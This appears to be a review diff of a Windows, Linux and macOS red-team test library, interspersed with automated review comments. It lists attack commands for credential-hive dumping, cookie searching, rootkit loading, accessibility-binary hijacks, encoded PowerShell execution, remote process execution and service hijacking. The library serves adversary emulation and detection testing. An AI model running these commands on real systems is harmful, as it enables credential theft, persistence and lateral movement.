#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
@@ -82,4 +91,7 @@ Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\No
<br/>
+6 -2
@@ -18,12 +18,13 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified
**Supported Platforms:** macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| search_string | String to search Safari cookies to find. | string | coinbase|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
@@ -31,4 +32,7 @@ grep -q "#{search_string}" "Cookies.binarycookies"
<br/>
+7 -3
@@ -18,7 +18,7 @@ Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sam_binary_path | Path of the SAM file | string | C:\Windows\System32\config\sam|
@@ -26,7 +26,8 @@ Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master
| security_binary_path | Path of the SECURITY file | string | C:\Windows\System32\config\security|
| output_folder | Output folder path | Path | C:\Windows\Temp|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
. $PathToAtomicsFolder\T1006\src\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam"
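Review bot: `. $PathToAtomicsFolder\T1006\src\Invoke-NinjaCopy.ps1` still dot-sources a hard-coded vendored path, while the same test in T1003.yaml gained a `ninjacopy_script_path` input with a download dependency and `ninjacopy_script_url`; the two tests load the same script, so give T1006 the same dependency block (or point it at the T1003 path) rather than keeping a second copy that the prereq check cannot see.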
@@ -34,7 +35,6 @@ Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folde
Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security"
```
#### Cleanup Commands:
```
rm "#{output_folder}\sam"
@@ -42,4 +42,8 @@ rm "#{output_folder}\system"
rm "#{output_folder}\security"
```
<br/>
+11 -3
@@ -17,7 +17,8 @@ Identify system services
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
tasklist.exe
sc query
@@ -26,6 +27,9 @@ sc query state= all
<br/>
<br/>
@@ -35,16 +39,20 @@ Enumerates started system services using net.exe and writes them to a file. This
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net.exe start >> #{output_file}
```
<br/>
+6 -2
@@ -18,16 +18,20 @@ Uses dd to add a zero to the binary to change the hash
**Supported Platforms:** macOS, Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
```
<br/>
+6 -2
@@ -17,13 +17,14 @@ Compiles and executes C# code to list main window titles associated with each pr
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_source_code | Path to source of C# code | path | PathToAtomicsFolder\T1010\src\T1010.cs|
| output_file_name | Name of output binary | string | T1010.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
@@ -31,4 +32,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #
<br/>
+6 -2
@@ -28,7 +28,8 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
powershell.exe New-Item -ItemType Directory -Name ART1012 -Path $env:USERPROFILE\AppData\Local\Temp\
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
@@ -55,10 +56,13 @@ reg save HKLM\System $env:USERPROFILE\AppData\Local\Temp\ART1012\system.hive"
reg save HKLM\SAM $env:USERPROFILE\AppData\Local\Temp\ART1012\sam.hive"
```
#### Cleanup Commands:
```
rmdir /q /s $env:USERPROFILE\AppData\Local\Temp\ART1012\
```
<br/>
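Review bot: the cleanup `rmdir /q /s $env:USERPROFILE\AppData\Local\Temp\ART1012\` runs under `command_prompt`, which does not expand `$env:USERPROFILE` (that syntax only works on the first attack line because it is passed to `powershell.exe`), so the ART1012 directory created by the `powershell.exe New-Item` line is never removed and anything saved into it stays on disk after the test; either write the cleanup as `rmdir /q /s %USERPROFILE%\AppData\Local\Temp\ART1012\` or run it through `powershell.exe` the way the `New-Item` line does.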
+18 -6
@@ -21,18 +21,22 @@ Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_file | Path To Module | String | Module.ko|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sudo insmod #{rootkit_file}
```
<br/>
<br/>
@@ -42,18 +46,22 @@ Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_file | Path To Module | String | Module.ko|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sudo modprobe #{rootkit_file}
```
<br/>
<br/>
@@ -70,16 +78,20 @@ It would be wise if you only run this in a test environment
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
puppetstrings #{driver_path}
```
<br/>
+28 -7
@@ -43,7 +43,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | osk.exe|
@@ -70,6 +70,9 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
```
<br/>
<br/>
@@ -79,7 +82,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | sethc.exe|
@@ -106,6 +109,9 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
```
<br/>
<br/>
@@ -115,7 +121,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | utilman.exe|
@@ -142,6 +148,9 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f
```
<br/>
<br/>
@@ -151,7 +160,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | magnify.exe|
@@ -178,6 +187,9 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f
```
<br/>
<br/>
@@ -187,7 +199,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | narrator.exe|
@@ -214,6 +226,9 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f
```
<br/>
<br/>
@@ -223,7 +238,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
@@ -250,6 +265,9 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f
```
<br/>
<br/>
@@ -259,7 +277,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | atbroker.exe|
@@ -286,4 +304,7 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f
```
<br/>
+20 -4
@@ -23,7 +23,8 @@ Identify network configuration information
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
ipconfig /all
netsh interface show
@@ -34,6 +35,9 @@ net config
<br/>
<br/>
@@ -43,13 +47,17 @@ Enumerates Windows Firewall Rules using netsh.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
netsh advfirewall firewall show rule name=all
```
<br/>
<br/>
@@ -59,7 +67,8 @@ Identify network configuration information
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
arp -a
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
@@ -68,6 +77,9 @@ ifconfig
<br/>
<br/>
@@ -77,7 +89,8 @@ Identify network configuration information as seen by Trickbot and described her
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
ipconfig /all
net config workstation
@@ -87,4 +100,7 @@ nltest /domain_trusts
<br/>
+41 -9
@@ -46,7 +46,8 @@ Identify remote systems with net.exe
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net view /domain
net view
@@ -54,6 +55,9 @@ net view
<br/>
<br/>
@@ -63,13 +67,17 @@ Identify remote systems with net.exe querying the Active Directory Domain Comput
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net group "Domain Computers" /domain
```
<br/>
<br/>
@@ -79,18 +87,22 @@ Identify domain controllers for specified domain.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_domain | Domain to query for domain controllers | String | domain.local|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
nltest.exe /dclist:#{target_domain}
```
<br/>
<br/>
@@ -100,13 +112,17 @@ Identify remote systems via ping sweep
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
```
<br/>
<br/>
@@ -116,13 +132,17 @@ Identify remote systems via arp
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
arp -a
```
<br/>
<br/>
@@ -132,13 +152,17 @@ Identify remote systems via arp
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
arp -a | grep -v '^?'
```
<br/>
<br/>
@@ -148,13 +172,17 @@ Identify remote systems via ping sweep
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
```
<br/>
<br/>
@@ -164,7 +192,8 @@ Powershell script that runs nslookup on cmd.exe against the local /24 network of
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
@@ -176,4 +205,7 @@ foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.
<br/>
+42 -5
@@ -23,7 +23,8 @@ Encrypt data for exiltration
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
mkdir /tmp/victim-files
cd /tmp/victim-files
@@ -46,6 +47,9 @@ which gpg
rm -Rf /tmp/victim-files
```
<br/>
<br/>
@@ -56,7 +60,8 @@ rar a -p"blue" hello.rar (VARIANT)
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
mkdir .\tmp\victim-files
cd .\tmp\victim-files
@@ -67,6 +72,9 @@ dir
<br/>
<br/>
@@ -77,18 +85,43 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT)
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| winzip_exe | Path to installed Winzip executable | Path | %ProgramFiles%\WinZip\winzip64.exe|
| winzip_url | Path to download Windows Credential Editor zip file | URL | https://download.winzip.com/gl/nkln/winzip24-home.exe|
| winzip_hash | File hash of the Windows Credential Editor zip file | String | B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB|
#### Attack Commands: Run with `command_prompt`!
```
path=%path%;"C:\Program Files (x86)\winzip"
mkdir .\tmp\victim-files
cd .\tmp\victim-files
echo "This file will be encrypted" > .\encrypted_file.txt
winzip32 -min -a -s"hello" archive.zip *
"#{winzip_exe}" -min -a -s"hello" archive.zip *
dir
```
#### Dependencies: Run with `powershell`!
##### Description: Winzip must be installed
##### Check Prereq Commands:
```
cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
```
##### Get Prereq Commands:
```
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
Write-Host Follow the installation prompts to continue
cmd /c "$env:Temp\winzip.exe"
}
```
<br/>
<br/>
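Review bot: the attack commands still begin with `path=%path%;"C:\Program Files (x86)\winzip"` even though `winzip32 -min -a -s"hello" archive.zip *` was replaced by the full `"#{winzip_exe}" -min -a -s"hello" archive.zip *`; the PATH edit is now dead code and its hard-coded x86 directory disagrees with the new default `%ProgramFiles%\WinZip\winzip64.exe`, so drop it. The check `cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'` reports through cmd's stdout, while the T1035 check added in this same PR emits a PowerShell value (`if (Test-Path ...) {0} else {1}`); settle on one convention and state in the dependencies section whether the runner reads stdout or the exit code, because a mismatch makes every prerequisite look satisfied (or unsatisfied) regardless of the host. The get-prereq step launches an interactive installer (`Write-Host Follow the installation prompts to continue` followed by `cmd /c "$env:Temp\winzip.exe"`), which blocks unattended runs, and the downloaded `$env:Temp\winzip.exe` is never deleted; mention the interactive requirement in the description and remove the installer once it has run.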
@@ -98,7 +131,8 @@ Note: Requires 7zip installation
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
mkdir $PathToAtomicsFolder\T1022\victim-files
cd $PathToAtomicsFolder\T1022\victim-files
@@ -109,4 +143,7 @@ dir
<br/>
+28 -1
@@ -49,6 +49,33 @@ atomic_tests:
wzzip sample.zip -s"blueblue" *.txt (VARIANT)
supported_platforms:
- windows
input_arguments:
winzip_exe:
description: Path to installed Winzip executable
type: Path
default: "%ProgramFiles%\\WinZip\\winzip64.exe"
winzip_url:
description: Path to download Windows Credential Editor zip file
type: url
default: https://download.winzip.com/gl/nkln/winzip24-home.exe
winzip_hash:
description: File hash of the Windows Credential Editor zip file
type: String
default: B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB
dependency_executor_name: powershell
dependencies:
- description: |
Winzip must be installed
prereq_command: |
cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
get_prereq_command: |
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
Write-Host Follow the installation prompts to continue
cmd /c "$env:Temp\winzip.exe"
}
executor:
name: command_prompt
elevation_required: false
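Review bot: the `winzip_url` and `winzip_hash` descriptions read "Path to download Windows Credential Editor zip file" and "File hash of the Windows Credential Editor zip file", a copy-paste from a different test; the generated markdown table prints these verbatim, so fix them here, e.g. `description: URL of the WinZip installer` and `description: SHA-256 hash of the WinZip installer`. `Invoke-WebRequestVerifyHash` is not defined anywhere in this YAML; if it is a helper supplied by the new dependency support in the PowerShell execution framework, document it there (including which hash algorithm its third argument is compared against), because a test runner that does not load that helper will fail on this `get_prereq_command` rather than on a missing WinZip. Also `type: url` is lower-case here while the sibling inputs use `type: Path` and `type: String` and the markdown table shows `URL`; keep the type names consistent.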
@@ -57,7 +84,7 @@ atomic_tests:
mkdir .\tmp\victim-files
cd .\tmp\victim-files
echo "This file will be encrypted" > .\encrypted_file.txt
winzip32 -min -a -s"hello" archive.zip *
"#{winzip_exe}" -min -a -s"hello" archive.zip *
dir
- name: Compress Data and lock with password for Exfiltration with 7zip
+12 -4
@@ -18,18 +18,22 @@ gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-Strin
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| shortcut_file_path | shortcut modified and execute | path | shortcutname.url|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path}
```
<br/>
<br/>
@@ -39,7 +43,8 @@ LNK file to launch CMD placed in startup folder
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk")
@@ -58,11 +63,14 @@ $ShortCut.Description = "T1023.";
$ShortCut.Save()
```
#### Cleanup Commands:
```
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk"
Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk"
```
<br/>
+18 -6
@@ -27,7 +27,8 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
@@ -37,6 +38,9 @@ chmod +x /tmp/art.sh
<br/>
<br/>
@@ -46,12 +50,13 @@ Creates base64-encoded PowerShell code and executes it. This is used by numerous
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
@@ -63,6 +68,9 @@ powershell.exe -EncodedCommand $EncodedCommand
<br/>
<br/>
@@ -72,14 +80,15 @@ Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates i
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
| registry_key_storage | Windows Registry Key to store code | String | HKCU:Software\Microsoft\Windows\CurrentVersion|
| registry_entry_storage | Windows Registry entry to store code under key | String | Debug|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
@@ -90,10 +99,13 @@ Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_sto
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
```
#### Cleanup Commands:
```
Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}
```
<br/>
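Review bot: the cleanup `Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}` passes `-Path` twice, which PowerShell rejects as a parameter specified more than once, so the encoded payload stored under `#{registry_key_storage}` / `#{registry_entry_storage}` is left in the registry after the test completes; drop the duplicate so the line reads `Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage}`.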
+29 -9
@@ -23,13 +23,17 @@ Powershell Enable WinRM
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
Enable-PSRemoting -Force
```
<br/>
<br/>
@@ -43,18 +47,22 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of Computer | string | computer1|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
<br/>
<br/>
@@ -64,20 +72,24 @@ Utilize WMIC to start remote process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator|
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
```
<br/>
<br/>
@@ -87,20 +99,24 @@ Utilize psexec to start remote process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator|
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
psexec \\host -u domain\user -p password -s cmd.exe
```
<br/>
<br/>
@@ -110,17 +126,21 @@ Execute Invoke-command on remote host
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host_name | Remote Windows Host Name | String | Test|
| remote_command | Command to execute on remote Host | String | ipconfig|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
```
<br/>
+6 -2
@@ -12,10 +12,11 @@
## Atomic Test #1 - Data Transfer Size Limits
Take a file/directory, split it into 5Mb chunks
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
cd /tmp/
dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
@@ -25,4 +26,7 @@ ls -l
<br/>
-2
@@ -9,8 +9,6 @@ atomic_tests:
supported_platforms:
- macos
- centos
- ubuntu
- linux
executor:
+6 -2
@@ -20,16 +20,20 @@ and will then revert the binPath change, restoring Fax to its original state.
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
sc start Fax
```
#### Cleanup Commands:
```
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
```
<br/>
+11 -3
@@ -27,12 +27,13 @@ Identify System owner or users on an endpoint
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of remote computer | string | computer1|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
cmd.exe /C whoami
wmic useraccount get /ALL
@@ -46,6 +47,9 @@ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active
<br/>
<br/>
@@ -55,7 +59,8 @@ Identify System owner or users on an endpoint
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
users
w
@@ -64,4 +69,7 @@ who
<br/>
+26 -8
@@ -17,13 +17,14 @@ Creates a service specifying an aribrary command and executes it. When executing
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | Name of service to create | string | ARTService|
| executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
sc.exe create #{service_name} binPath= #{executable_command}
sc.exe start #{service_name}
@@ -32,6 +33,9 @@ sc.exe delete #{service_name}
<br/>
<br/>
@@ -42,21 +46,35 @@ Will run a command on a remote host
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| psexec_path | Path to PsExec | string | C:\PSTools\PsExec.exe|
| psexec_exe | Path to PsExec | string | C:\PSTools\PsExec.exe|
| remote_host | Remote hostname or IP address | string | localhost|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
#{psexec_path} \\#{remote_host} "C:\Windows\System32\calc.exe"
#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
```
#### Commands to Check Prerequisites:
#### Dependencies: Run with `powershell`!
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```
if(Test-Path #{psexec_path}) {0} else {1}
if (Test-Path "#{psexec_exe}"") {0} else {1}
```
##### Get Prereq Commands:
```
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
```
<br/>
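Review bot: `if (Test-Path "#{psexec_exe}"") {0} else {1}` has a stray quote: inside a double-quoted PowerShell string `""` is an escaped quote, so the string never terminates and the whole check fails to parse; the line it replaces, `if(Test-Path #{psexec_path}) {0} else {1}`, was well-formed, so write `if (Test-Path "#{psexec_exe}") {0} else {1}`. The get-prereq step `New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null` creates a directory at the executable's own path (`C:\PSTools\PsExec.exe` with the default input), after which `Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force` places the binary inside that directory; `Test-Path` then reports success, but the executor's `#{psexec_exe} \\#{remote_host} ...` cannot run a directory. Create the parent instead: `New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null`.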
+14 -4
@@ -32,7 +32,7 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
psexec_path:
psexec_exe:
description: Path to PsExec
type: string
default: "C:\\PSTools\\PsExec.exe"
@@ -40,10 +40,20 @@ atomic_tests:
description: Remote hostname or IP address
type: string
default: localhost
dependencies:
- description: |
PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
prereq_command: |
if (Test-Path "#{psexec_exe}"") {0} else {1}
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
executor:
name: powershell
elevation_required: false
prereq_command: |
if(Test-Path #{psexec_path}) {0} else {1}
command: |
#{psexec_path} \\#{remote_host} "C:\Windows\System32\calc.exe"
#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
